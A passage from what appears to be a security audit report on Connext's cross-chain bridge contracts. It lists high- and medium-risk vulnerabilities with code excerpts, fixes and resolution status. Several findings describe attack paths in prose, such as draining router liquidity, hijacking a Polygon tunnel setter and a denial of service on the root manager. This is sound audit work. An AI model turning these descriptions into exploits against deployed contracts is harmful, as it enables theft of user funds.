_handleExecuteLiquidity(...) ... { ... (uint256 amount, address adopted) = AssetLogic.swapFromLocalAssetIfNeeded(...); ... } AssetLogic.sol function swapFromLocalAssetIfNeeded(...) ... { ... return _swapAsset(...); } function _swapAsset(... ) ... { ... SwapUtils.Swap storage ipool = s.swapStorages[_key]; if (ipool.exists()) { // Swap via the internal pool. return ... ipool.swapInternal(...) ... } } SwapUtils.sol function swapInternal(...) ... { IERC20 tokenFrom = self.pooledTokens[tokenIndexFrom]; require(dx <= tokenFrom.balanceOf(msg.sender), "more than you own"); // msg.sender is the relayer ... } Recommendation: Don't use the balance of msg.sender. Connext: Solved in PR 2120. Spearbit: Verified. +5.1.2 MERKLE.insert does not return the updated tree leaf count Severity: High Risk Context: Merkle.sol#L74 Description: The NatSpec comment for insert is * @return uint256 Updated count (number of nodes in the tree). But that is not true. If the updated count is 2^k * (2n + 1), where k and n are non-negative integers, then the return value would be 2n + 1. Currently, the returned value of insert is not being used; otherwise, this could be a bigger issue. Recommendation: Cache tree.count + 1 in another variable and return that, or do not modify size while inserting the new leaf and calculating the new root. Alternatively, modify the @return NatSpec comment to indicate the exact value returned. Connext: Solved in PR 2211. Spearbit: Verified. The original function (with the specific signature) has been removed. In the new function, function insert(Tree memory tree, bytes32 node) internal pure returns (Tree memory), the returned Tree has the correct leaf count.
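For reference, a minimal compilable skeleton of the cached-count variant of the original recommendation (the Tree struct is simplified and the branch/root bookkeeping is elided):

struct Tree {
  uint256 count;
  // the real tree also stores branch nodes for incremental root updates
}

function insert(Tree storage tree, bytes32 node) internal returns (uint256) {
  uint256 updatedCount = tree.count + 1; // cache before the tree is mutated
  tree.count = updatedCount;
  // ... hash `node` into the branch array and recompute the root here ...
  return updatedCount; // the true number of leaves, for any count
}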
+5.1.3 PolygonSpokeConnector or PolygonHubConnector can get compromised and DoSed if an address(0) is passed to their constructor for _mirrorConnector Severity: High Risk Context: • FxBaseChildTunnel.sol#L38-L41 • FxBaseRootTunnel.sol#L58-L61 • Connector.sol#L119-L121 • PolygonSpokeConnector.sol#L78-L82 • PolygonHubConnector.sol#L51-L55 Description: PolygonSpokeConnector (PolygonHubConnector) inherits from SpokeConnector (HubConnector) and FxBaseChildTunnel (FxBaseRootTunnel). When PolygonSpokeConnector (PolygonHubConnector) gets deployed and its constructor is called, if _mirrorConnector == address(0), then setting the mirrorConnector storage variable is skipped: // File: Connector.sol#L118-L121 if (_mirrorConnector != address(0)) { _setMirrorConnector(_mirrorConnector); } Now, since setFxRootTunnel (setFxChildTunnel) is an unprotected endpoint that is not overridden by PolygonSpokeConnector (PolygonHubConnector), anyone can call it and assign their own fxRootTunnel (fxChildTunnel) address (note: fxRootTunnel (fxChildTunnel) is supposed to correspond to mirrorConnector on the destination domain). Note that the require statement in setFxRootTunnel (setFxChildTunnel) only allows fxRootTunnel (fxChildTunnel) to be set once (to a non-zero address value), so afterward even the owner cannot update this value. If at some later time the owner tries to call setMirrorConnector to assign the mirrorConnector, since _setMirrorConnector is overridden by PolygonSpokeConnector (PolygonHubConnector), the following will try to execute: // File: PolygonSpokeConnector.sol#L78-L82 function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxRootTunnel(_mirrorConnector); } Or for PolygonHubConnector: // File: PolygonHubConnector.sol#L51-L55 function _setMirrorConnector(address _mirrorConnector) internal override { super._setMirrorConnector(_mirrorConnector); setFxChildTunnel(_mirrorConnector); } But this will revert, since fxRootTunnel (fxChildTunnel) is already set. Thus, if the owner of PolygonSpokeConnector (PolygonHubConnector) does not provide a non-zero address value for mirrorConnector upon deployment, a malicious actor can set fxRootTunnel, which will cause: 1. Rerouting of messages from Polygon to Ethereum to an address decided by the malicious actor (or vice versa for PolygonHubConnector). 2. DoSing of the setMirrorConnector and PolygonSpokeConnector's setFxRootTunnel (fxChildTunnel) endpoints for the owner. Recommendation: Make sure either that a non-zero address value of _mirrorConnector is submitted/enforced in the PolygonSpokeConnector (PolygonHubConnector) constructor, or override the setFxRootTunnel (setFxChildTunnel) endpoint to disallow calls from random users, enabling only a select few privileged users to call it. Connext: Only the owner can update now. Solved in PR 2387. Spearbit: Verified.
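A minimal sketch of the two suggested guards for the Polygon spoke variant (either is sufficient; the onlyOwner modifier is assumed to be available from the connector's ownable base):

// Option 1: in the constructor, enforce a non-zero mirror connector
require(_mirrorConnector != address(0), "!mirrorConnector");

// Option 2: protect the previously unprotected endpoint
function setFxRootTunnel(address _fxRootTunnel) external override onlyOwner {
  require(fxRootTunnel == address(0), "ALREADY_SET");
  fxRootTunnel = _fxRootTunnel;
}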
+5.1.4 A malicious owner or user with a Role.Router role can drain a router's liquidity Severity: High Risk Context: • RoutersFacet.sol#L263-L267 • RoutersFacet.sol#L297 • RoutersFacet.sol#L498 • BridgeFacet.sol#L622 Description: A malicious owner or user with the Role.Router role, denoted A in this example, can drain the liquidity of a current router (a router that has already been added to the system and might potentially have added big liquidities to some assets). Here is how A can do it (it can also be done atomically): 1. Remove the router by calling removeRouter. 2. Add the router back by calling setupRouter, and set the owner and recipient parameters to accounts A has access to / control over. 3. Loop over all tokens for which the router has liquidity, and call removeRouterLiquidityFor to drain/redirect the funds into accounts A has control over. That means all routers would need to put their trust in the owner (of this Connext instance) and in any user who has a Role.Router role with their liquidity. So the setup is currently not trustless. Recommendation: To remove this trust assumption, a redesign is required for how routers get integrated into this system. It starts from here: it would be best to have the function in a form like function addRouter(IRouter router) (renaming setupRouter to addRouter), where IRouter is an interface that tries to shape some requirements that the router would need to have. A router: 1. Needs to be able to set its own owner or recipient if required. It might not always be required. 2. Needs to be able to sign transfers and bid for those transfers to a sequencer. 3. If approved for using Aave Portal, it might need to be able to call repayAavePortal. But it is not necessary, since anyone can call repayAavePortalFor to repay the fees/debts for this router. 4. Can implement calling addRouterLiquidity to add liquidity. But it is not necessary, since anyone can call addRouterLiquidityFor for this router. 5. If the router does not register an account as its owner (this also needs to be implemented in this contract for this new redesign), it needs to implement calling removeRouterLiquidity to remove its liquidity. If it does register an owner, implementing calls to removeRouterLiquidity is not necessary, since the router's owner can call removeRouterLiquidityFor. Connext: Solved in PR 2413. Spearbit: Verified. +5.1.5 Users are forced to accept any slippage on the destination chain Severity: High Risk Context: BridgeFacet.sol#L28 Description: The documentation mentions that there is a cancel function on the destination domain that allows users to send the funds back to the origin domain, accepting the loss incurred by slippage from the origin pool. However, this feature is not found in the current codebase. If a high slippage rate persists continuously on the destination domain, the users will be forced to accept the high slippage rate. Otherwise, their funds will be stuck in Connext. Recommendation: Implement the cancel function on the destination domain to allow users to send funds back to the origin domain if they choose not to accept the high slippage rate on the destination domain. Connext: Solved in PR 2456. Spearbit: Verified. +5.1.6 Preservation of msg.sender in ZkSync could break certain trust assumptions Severity: High Risk Context: Any contract deployed on ZkSync that relies on msg.sender Description: For the ZkSync chain, the msg.sender is preserved for L1 -> L2 calls. One of the rules when pursuing a cross-chain strategy is to never assume that address control between L1 and L2 is always guaranteed. For EOAs (i.e., non-contract accounts), it is generally true that any account that can be accessed on Ethereum will also be accessible on other EVM-based chains. However, this is not always true for contract-based accounts, as the same account/wallet address might be owned by different persons on different chains. This might happen if there is a poorly implemented smart contract wallet factory on multiple EVM-based chains that deterministically deploys a wallet based on some user-defined inputs.
For instance, if a smart contract wallet factory deployed on both EVM-based chains uses deterministic CREATE2, which allows users to define its salt when deploying the wallet, Bob might use ABC as salt on Ethereum and Alice might use ABC as salt on ZkSync. Both of them will end up getting the same wallet address on two different chains. A similar issue occurred in the Optimism-Wintermute hack, but the actual incident is more complicated. Assume that 0xABC is a smart contract wallet owned and deployed by Alice on the ZkSync chain. Alice performs an xcall from Ethereum to ZkSync with delegate set to the 0xABC address. Thus, on the destination chain (ZkSync), only Alice's smart contract wallet 0xABC is authorized to call functions protected by the onlyDelegate modifier. Bob (an attacker) sees that the 0xABC address is not owned by anyone on Ethereum. Therefore, he proceeds to take ownership of 0xABC by interacting with the wallet factory to deploy a smart contract wallet at the same address on Ethereum. Bob can do so by checking out the inputs that Alice used to create the wallet previously. Thus, Bob can technically make a request from L1 -> L2 to impersonate Alice's wallet (0xABC) and bypass the onlyDelegate modifier on ZkSync. Additionally, Bob could make an L1 -> L2 request by calling ZkSync's BridgeFacet.xcall directly to steal Alice's approved funds. Since the xcall relies on msg.sender, it will assume that the caller is Alice. This issue is specific to the ZkSync chain due to the preservation of msg.sender for L1 -> L2 calls. For the other chains, the msg.sender is not preserved for L1 -> L2 calls and will always point to the L2's AMB forwarding the requests. Recommendation: Due to the preservation of msg.sender for L1 -> L2 calls on the ZkSync chain, any contract deployed on ZkSync that relies on msg.sender for access control should be aware of the possibility that the same address on the Ethereum and ZkSync chains might belong to two different owners. This issue will only happen if contract-based accounts are involved. It does not affect EOAs, as only the owner who has the private key of the EOA can control the EOA on any EVM chain. If Connext plans to support ZkSync, it is recommended that only EOAs can interact with ZkSync. Otherwise, add a disclaimer/comment informing the users about the risks and asking them to verify that they have ownership of the address on both Ethereum and ZkSync before proceeding to interact with ZkSync. Connext: Update from the zkSync team: We have a different address generation schema that would not allow an address to be claimed on L2 by an adversary. Even if you deploy the same address with the same private key, it would be different. Spearbit: Acknowledged; since the ZkSync L2 is using a different address generation schema as per the ZkSync team, this attack vector will not be possible. +5.1.7 No way to update a Stable Swap once assigned to a key Severity: High Risk Context: SwapAdminFacet.sol#L109 Description: Once a Stable Swap is assigned to a key (the hash of the canonical id and domain for the token), it cannot be updated nor deleted. A Swap can be hacked, or an improved version may be released, which will warrant updating the Swap for a key. Recommendation: Add a privileged removeSwap() function to remove a Swap already assigned to a key. In case a Swap has to be updated, it can be deleted and then initialized, as sketched below. Connext: Solved in PR 2354. Spearbit: Verified.
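A minimal sketch of such a privileged removal endpoint (the modifier and event names are ours, and it assumes any LP funds have been drained first):

function removeSwap(bytes32 key) external onlyOwnerOrAdmin {
  // deletes the pool so it can be re-initialized via initializeSwap()
  delete s.swapStorages[key];
  emit SwapRemoved(key, msg.sender);
}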
+5.1.8 Renouncing ownership or admin role could affect the normal operation of Connext Severity: High Risk Context: WatcherClient.sol, WatcherManager.sol, Merkle.sol, RootManager.sol, ConnextPriceOracle.sol, UpgradeBeaconController.sol, ProposedOwnableFacet.sol#L276-L285 Description: Consider the following scenarios. • Instance 1 - Renouncing ownership: All the contracts that extend from ProposedOwnable or ProposedOwnableUpgradeable inherit a method called renounceOwnership. The owner of the contract can use this method to give up their ownership, thereby leaving the contract without an owner. If that were to happen, it would not be possible to perform any owner-specific functionality on that contract anymore. The following is a summary of the affected contracts and their impact if the ownership has been renounced. One of the most significant impacts is that Connext's message system cannot recover after a fraud has been resolved, since there is no way to unpause and add the connector back to the system. • Instance 2 - Renouncing the admin role: All the contracts that extend from ProposedOwnableFacet inherit a method called revokeRole. 1. Assume that the Owner has renounced its power and the only remaining Admin used revokeRole to renounce its Admin role. 2. Now the contract is left with zero Owners & Admins. 3. All swap operations collect adminFees via the SwapUtils.sol contract. In the absence of any Admin & Owner, these fees will get stuck in the contract with no way to retrieve them. Normally they would have been withdrawn using withdrawSwapAdminFees (SwapAdminFacet.sol). 4. This is simply one example; there are multiple other critical functionalities impacted once both Admin and Owner revoke their roles. Recommendation: 1. Review whether the renounceOwnership function is required for each of the affected contracts and remove it where it is not needed. Ensure that renouncing ownership in any of the affected contracts will not affect the normal operation of Connext. 2. Revise the revokeRole function to ensure that at least one Admin always remains in the system who will be responsible for managing all critical operations in case the owner renounces the role. Connext: Solved in PR 2412. Spearbit: Verified. +5.1.9 No way of removing Fraudulent Roots Severity: High Risk Context: RootManager.sol#L1 Description: Fraudulent roots cannot be removed once fraud is detected by the Watcher. This means that fraudulent roots will be propagated to each chain. Recommendation: Create a new method (callable only by the Owner) which can be called when the contract is in a paused state to remove the offending roots from the queue; see the sketch below. Connext: Ideas regarding resolution discussed in the Pull Conversation linked with this issue. Spearbit: Verified.
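A minimal sketch of such a method (clear() and the event are hypothetical helpers; the actual queue internals are project-specific):

function discardPendingInboundRoots() external onlyOwner whenPaused {
  // drop every queued inbound root, including fraudulent ones,
  // so the system can restart cleanly once fraud is resolved
  pendingInboundRoots.clear();
  emit PendingInboundRootsDiscarded(msg.sender);
}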
+5.1.10 Large number of inbound roots can DOS the RootManager Severity: High Risk Context: RootManager.sol#L154-L163 Description: It is possible to perform a DOS against the RootManager by exploiting the dequeueVerified function or the insert function of RootManager.sol. The following describes the possible attack path: 1. Assume that a malicious user calls the permissionless GnosisSpokeConnector.send function 1000 times (or any number of times that will cause an Out-of-Gas error later) within a single transaction/block on Gnosis, causing a large number of Gnosis's outboundRoots to be forwarded to the GnosisHubConnector on Ethereum. 2. Since the 1000 outboundRoots were sent in the same transaction/block earlier, all of them should arrive at the GnosisHubConnector within the same block/transaction on Ethereum. 3. For each of the 1000 outboundRoots received, the GnosisHubConnector.processMessage function will be triggered to process it, which will in turn call the RootManager.aggregate function to add the received outboundRoot to the pendingInboundRoots queue. As a result, 1000 outboundRoots with the same commitBlock will be added to the pendingInboundRoots queue. 4. After the delay period, the RootManager.propagate function will be triggered. The function will call the dequeueVerified function to dequeue 1000 verified outboundRoots from the pendingInboundRoots queue by looping through the queue. This might result in an Out-of-Gas error and cause a revert. 5. If the above dequeueVerified function does not revert, the RootManager.propagate function will attempt to insert 1000 verified outboundRoots into the aggregated Merkle tree, which might also result in an Out-of-Gas error and cause a revert. If the RootManager.propagate function reverts when called, the latest aggregated Merkle root cannot be forwarded to the spokes. As a result, none of the messages can be proven and processed on the destination chains. Note: the processing on the Hub (which is on mainnet) can also become very expensive, as mainnet usually has a far higher gas cost than the Spokes. Recommendation: Both solutions should be implemented to sufficiently mitigate this issue. 1. Place restrictions on the SpokeConnector's send function. The send function should be restricted so that the domain's outbound root will only be forwarded to the hub when the following conditions are met: • The last root sent is different from the current root to be sent. • The execution interval has lapsed (e.g. the send function can only be triggered once every few minutes) - this is to prevent a malicious user from bypassing the first measure (lastRootSent != outboundRoot) by sending a cheap message to trigger the dispatch function to change the outboundRoot to a new one before calling the send function. 2. Bound the number of outbound roots that can be aggregated per call, and allow them to be processed in batches (if needed). Connext: Solved in PR 2199 and PR 2545. Spearbit: Verified. +5.1.11 Missing mirrorConnector check on Optimism hub connector Severity: High Risk Context: OptimismHubConnector.sol#L69-L121 Description: processMessageFromRoot() calls _processMessage() to process messages for the "fast" path. But _processMessage() can also be called by the AMB in the slow path. The second call to _processMessage() is not necessary (and could double-process the message, which luckily is prevented via the processed[] mapping). The second call (from the AMB directly to _processMessage()) also doesn't properly verify the origin of the message, which might allow the insertion of fraudulent messages. function processMessageFromRoot(...) ... { ... _processMessage(abi.encode(_data)); ... } function _processMessage(bytes memory _data) internal override { // sanity check root length require(_data.length == 32, "!length"); // get root from data bytes32 root = bytes32(_data); if (!processed[root]) { // set root to processed processed[root] = true; // update the root on the root manager IRootManager(ROOT_MANAGER).aggregate(MIRROR_DOMAIN, root); } // otherwise root was already sent to root manager } Recommendation: Remove the second path. Connext: Solved in PR 2447. Spearbit: Verified.
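A sketch of one way to remove the second path: keep the origin verification and the processed[] bookkeeping inside processMessageFromRoot() and disable the inherited AMB entry point. This is our shape for the fix, not necessarily the one taken in PR 2447:

function _processMessage(bytes memory) internal pure override {
  // the slow path is intentionally unsupported; roots are only accepted
  // through processMessageFromRoot(), which verifies the message origin
  revert("!supported");
}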
+5.1.12 Add _mirrorConnector to _sendMessage of BaseMultichain Severity: High Risk Context: BaseMultichain.sol#L39-L47 Description: The function _sendMessage() of BaseMultichain sends the message to the address of the _amb. This doesn't seem right, as the first parameter is the target contract to interact with, according to the Multichain cross-chain documentation. This should probably be the _mirrorConnector. function _sendMessage(address _amb, bytes memory _data) internal { Multichain(_amb).anyCall( _amb, // Same address on every chain, using AMB as it is immutable ... ); } Recommendation: Double-check the conclusion and change the code to:

- function _sendMessage(address _amb, bytes memory _data) ... {
+ function _sendMessage(address _amb, address _mirrorConnector, bytes memory _data) ... {
    Multichain(_amb).anyCall(
-     _amb,
+     _mirrorConnector,
      ...
    );
  }

Connext: Solved in PR 2386. Spearbit: Verified. +5.1.13 Unauthorized access to change acceptanceDelay Severity: High Risk Context: DiamondInit.sol#L35-L40 Description: The acceptanceDelay, along with supportedInterfaces[], can be set by any user without any authorization once the init function of DiamondInit has been called and set. This is happening because the caller check (LibDiamond.enforceIsContractOwner();) is missing for these fields. Since acceptanceDelay defines the time after which certain actions can be executed, setting a very large value could DOS the system (a new owner cannot be set) and setting a very low value could allow changes without consideration time (setting/renouncing Admin, disabling whitelisting, etc. in ProposedOwnableFacet.sol). Recommendation: Change the function implementation as shown below:

  LibDiamond.DiamondStorage storage ds = LibDiamond.diamondStorage();
- ds.supportedInterfaces[type(IERC165).interfaceId] = true;
- ds.supportedInterfaces[type(IDiamondCut).interfaceId] = true;
- ds.supportedInterfaces[type(IDiamondLoupe).interfaceId] = true;
- ds.supportedInterfaces[type(IProposedOwnable).interfaceId] = true;
- ds.acceptanceDelay = _acceptanceDelay;
  if (!s.initialized) {
    ...
+   ds.supportedInterfaces[type(IERC165).interfaceId] = true;
+   ds.supportedInterfaces[type(IDiamondCut).interfaceId] = true;
+   ds.supportedInterfaces[type(IDiamondLoupe).interfaceId] = true;
+   ds.supportedInterfaces[type(IProposedOwnable).interfaceId] = true;
+   ds.acceptanceDelay = _acceptanceDelay;
    ...
  }

Connext: Fixed in PR 2393. Spearbit: Verified. +5.1.14 Messages destined for ZkSync cannot be processed Severity: High Risk Context: ZkSyncHubConnector.sol#L49-L72 Description: For the ZkSync chain, L2 to L1 communication is free, but L1 to L2 communication requires a certain amount of ETH to be supplied to cover the base cost of the transaction (including the _l2Value) plus a layer 2 operator tip. The _sendMessage function of ZkSyncHubConnector.sol relies on the IZkSync(AMB).requestL2Transaction function to send messages from L1 to L2. However, the requestL2Transaction call will always fail because no ETH is supplied to the transaction (msg.value is zero). As a result, the ZkSync hub connector on Ethereum cannot forward the latest aggregated Merkle root to the ZkSync spoke connector on the ZkSync chain. Thus, any message destined for the ZkSync chain cannot be processed, since incoming messages cannot be proven without the latest aggregated Merkle root.
function _sendMessage(bytes memory _data) internal override { // Should always be dispatching the aggregate root require(_data.length == 32, "!length"); // Get the calldata bytes memory _calldata = abi.encodeWithSelector(Connector.processMessage.selector, _data); // Dispatch message // https://v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#structure // calling L2 smart contract from L1 Example contract // note: msg.value must be passed in and can be retrieved from the AMB view function `l2TransactionBaseCost` // https://v2-docs.zksync.io/dev/developer-guides/Bridging/l1-l2.html#using-contract-interface-in-your-project IZkSync(AMB).requestL2Transaction{value: msg.value}( // The address of the L2 contract to call mirrorConnector, // We pass no ETH with the call 0, // Encoding the calldata for the execute _calldata, // Ergs limit 10000, // factory dependencies new bytes[](0) ); } Additionally, the ZkSync hub connector contract needs to be loaded with ETH so that it can forward the appropriate amount of ETH when calling ZkSync's requestL2Transaction. However, it is not possible to do so, because no receive(), fallback, or payable function has been implemented within the contract and its parent contracts for accepting ETH. Recommendation: Ensure that ETH can be sent to the contract and that an appropriate amount of ETH is supplied when sending messages from L1 to L2 via ZkSync's requestL2Transaction call. Connext: Solved in PR 2407 and PR 2443. Spearbit: Verified. +5.1.15 Cross-chain messaging via Multichain protocol will fail Severity: High Risk Context: BaseMultichain.sol#L39-L47 Description: Multichain v6 is supported by Connext for cross-chain messaging. The _sendMessage function of BaseMultichain.sol relies on Multichain's anyCall for cross-chain messaging. Per the AnyCall V6 documentation, a gas fee for transaction execution needs to be paid either on the source or the destination chain when anyCall is called. However, anyCall is called without consideration of the gas fee within the connectors, and thus the anyCall will always fail. Since Multichain's hub and spoke connectors are unable to send messages, cross-chain messaging using Multichain within Connext will not work.
5.2 Medium Risk +5.2.1 _domainSeparatorV4() not updated after name/symbol change Severity: Medium Risk Context: BridgeToken.sol#L58-L63, OZERC20.sol#L382-L388, OZERC20.sol#L348-L369, draft-EIP712.sol, EIP712.sol#L69-L75, EIP712.sol#L100-L102 Description: The BridgeToken allows updating the name and symbol of a token. However the _CACHED_DOMAIN_- SEPARATOR (of EIP712) isn't updated. This means that permit(), which uses _hashTypedDataV4() and _CACHED_- DOMAIN_SEPARATOR, still uses the old value. On the other hand DOMAIN_SEPARATOR() is updated. Both and especially their combination can give unexpected results. BridgeToken.sol function setDetails(string calldata _newName, string calldata _newSymbol) external override onlyOwner { // careful with naming convention change here token.name = _newName; token.symbol = _newSymbol; emit UpdateDetails(_newName, _newSymbol); } OZERC20.sol 18 function DOMAIN_SEPARATOR() external view override returns (bytes32) { // See {EIP712._buildDomainSeparator} return keccak256( abi.encode(_TYPE_HASH, keccak256(abi.encode(token.name)), _HASHED_VERSION, block.chainid, ,! address(this)) ); } function permit(...) ... { ... bytes32 _hash = _hashTypedDataV4(_structHash); ... } draft-EIP712.sol import "./EIP712.sol"; EIP712.sol function _hashTypedDataV4(bytes32 structHash) internal view virtual returns (bytes32) { return ECDSA.toTypedDataHash(_domainSeparatorV4(), structHash); } function _domainSeparatorV4() internal view returns (bytes32) { if (address(this) == _CACHED_THIS && block.chainid == _CACHED_CHAIN_ID) { return _CACHED_DOMAIN_SEPARATOR; } else { return _buildDomainSeparator(_TYPE_HASH, _HASHED_NAME, _HASHED_VERSION); } } Recommendation: Make the implementation of DOMAIN_SEPARATOR() and _domainSeparatorV4() the same. Decide on using cached versions of the domain separator. See also issue "EIP712 domain separator can be cached" Connext: Solved in PR 2350. Spearbit: Verified. +5.2.2 diamondCut() allows re-execution of old updates Severity: Medium Risk Context: LibDiamond.sol#L112-L115 Description: Once diamondCut() is executed, ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _- init, _calldata))] is not reset to zero. This means the contract owner can rerun the old updates again without any delay by executing diamondCut() function. Assume the following: diamondCut() function is executed to update the facet selector with version_2 A bug is found in ver- sion_2 and it is rolled back Owner can still execute diamondCut() function which will again update the facet selector to version 2 since ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))] is still valid Recommendation: Reset ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))] to zero as shown below: 19 function diamondCut( IDiamondCut.FacetCut[] memory _diamondCut, address _init, bytes memory _calldata ) internal { ... if (ds.facetAddresses.length != 0) { uint256 time = ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))]; require(time != 0 && time <= block.timestamp, "LibDiamond: delay not elapsed"); } ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))] = 0; + ... } Connext: Fix in PR 2222. Spearbit: Verified. +5.2.3 User may not be able to override slippage on destination Severity: Medium Risk Context: BridgeFacet.sol#L741-L746 Description: If BridgeFacet.execute() is executed before BridgeFacet.forceUpdateSlippage(), user won't be able to update slippage on the destination chain. 
In this case, the slippage specified on the source chain is used. Due to different conditions on these chains, a user may want to specify different slippage values. This can result in user loss, as a slippage tolerance higher than necessary will result in the swap trade being sandwiched. Recommendation: xcall() can take different parameters for source and destination slippage:

function xcall(
  uint32 _destination,
  address _to,
  address _asset,
  address _delegate,
  uint256 _amount,
- uint256 _slippage,
+ uint256 _sourceSlippage,
+ uint256 _destinationSlippage,
  bytes calldata _callData
) external payable returns (bytes32);

Then the TransferInfo params should be encoded with _destinationSlippage, and _sourceSlippage should be passed separately to _xcall(). Connext: We previously had the slippage implemented as separate values, but decided to change it back for a couple of reasons: 1. Since the messaging chains have variable latency, the destinationChainSlippage would be hard to predict at the time of xcall, especially for authenticated messages. Users can override this using forceUpdateSlippage, but it requires an additional transaction. 2. Adding two parameters to the interface clutters it, and we strove to make the xcall interface as minimal as possible so the developer experience has the lowest necessary overhead. Spearbit: Acknowledged. If you see this issue after launch, you can also consider adding an argument forceUpdateSlippageOnDestination to xcall(). Then, unless the user calls forceUpdateSlippage() on the destination (identified by some state variable), the transfer on the destination is not allowed to be completed. This is a complex solution, so it is only recommended if you anticipate this being an issue in production. It also depends on how quickly the transfers on the destination are completed. +5.2.4 Do not rely on token balance to determine when cap is reached Severity: Medium Risk Context: BridgeFacet.sol#L492-L495, RoutersFacet.sol#L556-L559 Description: Connext Diamond defines a cap on each token. Any transfer making the total token balance more than the cap is reverted. uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); } Anyone can send tokens to the Connext Diamond to artificially increase the custodied amount, since it depends on the token balance. This can be an expensive attack, but it can become viable if the price of a token (including next assets) drops. Recommendation: Do not rely on the token balance to determine the custodied amount. Instead, consider maintaining the custodied amount whenever assets are transferred in or out via AssetLogic's handleIncomingAsset() and handleOutgoingAsset(). With this change, any token transfer in and out of Connext should be done via these functions to properly maintain the custodied amount. Note: Also consider the issue "Malicious routers can temporarily DOS the bridge by depositing a large amount of liquidity" when applying the recommendation. Connext: Solved in PR 2444. Spearbit: Verified. +5.2.5 Router recipient can be configured more than once Severity: Medium Risk Context: RoutersFacet.sol#L401 Description: The comments on the setRouterRecipient function mention that the router should only be able to set the recipient once; otherwise, no problem is solved. However, based on the current implementation, it is possible for the router to set its recipient more than once.
File: RoutersFacet.sol
394:  /**
395:   * @notice Sets the designated recipient for a router
396:   * @dev Router should only be able to set this once otherwise if router key compromised,
397:   * no problem is solved since attacker could just update recipient
398:   * @param router Router address to set recipient
399:   * @param recipient Recipient Address to set to router
400:   */
401:  function setRouterRecipient(address router, address recipient) external onlyRouterOwner(router) {

Let's assume that during router setup, the setupRouter function is called, the owner is set to Alice's first EOA (0x123), and the recipient is set to Alice's second EOA (0x456). Although the comment mentions that the recipient should only be set once, this is not true, because this function will only revert if _prevRecipient == recipient. As long as the new recipient is not the same as the previous recipient, the function will happily accept the new recipient. Therefore, if the router's signing key is compromised by Bob (an attacker), he could call the setRouterRecipient function to change the recipient to his personal EOA and drain the funds within the router. The setRouterRecipient function is protected by the onlyRouterOwner modifier. Since Bob has the compromised router's signing key, he will be able to pass this validation check.

File: RoutersFacet.sol
157:  /**
158:   * @notice Asserts caller is the router owner (if set) or the router itself
159:   */
160:  modifier onlyRouterOwner(address _router) {
161:    address owner = s.routerPermissionInfo.routerOwners[_router];
162:    if (!((owner == address(0) && msg.sender == _router) || owner == msg.sender))
163:      revert RoutersFacet__onlyRouterOwner_notRouterOwner();
164:    _;
165:  }

The second validation is at Line 404, which checks that the new recipient is not the same as the previous recipient. The recipient variable is set to Bob's EOA wallet, while the _prevRecipient variable is set to Alice's second EOA (0x456). Therefore, the condition at Line 404 is false, and it will not revert. So Bob successfully sets the recipient to his EOA at Line 407.

File: RoutersFacet.sol
401:  function setRouterRecipient(address router, address recipient) external onlyRouterOwner(router) {
402:    // Check recipient is changing
403:    address _prevRecipient = s.routerPermissionInfo.routerRecipients[router];
404:    if (_prevRecipient == recipient) revert RoutersFacet__setRouterRecipient_notNewRecipient();
405:
406:    // Set new recipient
407:    s.routerPermissionInfo.routerRecipients[router] = recipient;

Per the GitHub discussion, the motivation for such a design is the following: If a router's signing key is compromised, the attacker could drain the liquidity stored on the contract and send it to any specified address. This effectively means the key is in control of all unused liquidity on chain, which prevents router operators from adding large amounts of liquidity directly to the contract. Routers should be able to delegate the safe withdrawal address of any unused liquidity, creating a separation of concerns between router key and liquidity safety. In summary, the team is trying to create a separation of concerns between the router key and liquidity safety. With the current implementation, there is no security benefit in segregating the router owner role and the recipient role unless the router owner has been burned (e.g. set to the zero address), because once the router's signing key is compromised, the attacker can change the recipient anyway.
The security benefits of the separation of concerns will only be achieved if the recipient can truly be set only once. Recommendation: If the intention is to only allow the router owner to set the recipient once and not allow them to change it afterward, then the code should be as follows.

function setRouterRecipient(address router, address recipient) external onlyRouterOwner(router) {
  // Check recipient is changing
  address _prevRecipient = s.routerPermissionInfo.routerRecipients[router];
+ if (_prevRecipient != address(0)) revert RoutersFacet__setRouterRecipient_RecipientAlreadySet();
- if (_prevRecipient == recipient) revert RoutersFacet__setRouterRecipient_notNewRecipient();

  // Set new recipient
  s.routerPermissionInfo.routerRecipients[router] = recipient;

  // Emit event
  emit RouterRecipientSet(router, _prevRecipient, recipient);
}

The above implementation will always revert as long as the recipient address has already been set. Connext: Solved in PR 2413. Spearbit: Verified. +5.2.6 The set of tokens in an internal swap pool cannot be updated Severity: Medium Risk Context: SwapAdminFacet.sol#L109-L119 Description: Once a swap is initialized by the owner or an admin (indexed by the key parameter), _pooledTokens, the set of tokens used in this stable swap pool, cannot be updated. The s.swapStorages[_key] pools are used in other facets for assets that have the hash of their canonical token id and canonical domain equal to _key, for example when we need to swap between a local and an adopted asset, or when a user provides liquidity or interacts with other external endpoints of StableSwapFacet. If the set of tokens submitted to this pool (_pooledTokens) includes, besides the local and adopted tokens corresponding to _key, some other bad/malicious tokens, users' funds in the pool in question can be at risk. If this happens, we need to pause the protocol, push an update, and call initializeSwap again. Recommendation: Document the procedure for how _pooledTokens is selected and submitted to initializeSwap to lower the risk of introducing potentially bad/malicious tokens into the system. Connext: Solved in PR 2354. Spearbit: Verified. +5.2.7 An incorrect decimal supplied to initializeSwap for a token cannot be corrected Severity: Medium Risk Context: SwapAdminFacet.sol#L109-L119 Description: Once a swap is initialized by the owner or an admin (indexed by the key parameter), the per-token decimal precisions, and therefore tokenPrecisionMultipliers, cannot be changed. If the supplied decimals include a wrong value, it will cause incorrect calculations when a swap is made, and currently there is no update mechanism for tokenPrecisionMultipliers, nor a mechanism for removing swapStorages[_key]. Recommendation: Add a restricted endpoint for updating the tokenPrecisionMultipliers of a token in an internal swap pool, in case a mistake has been made when providing the decimals; a sketch follows below. Connext: We will remove the swap in case we made a mistake when initializing the swap pool, because we would have to update the token balances and adminFees in the swap object when updating tokenPrecisionMultipliers. Solved in PR 2354. Spearbit: Verified.
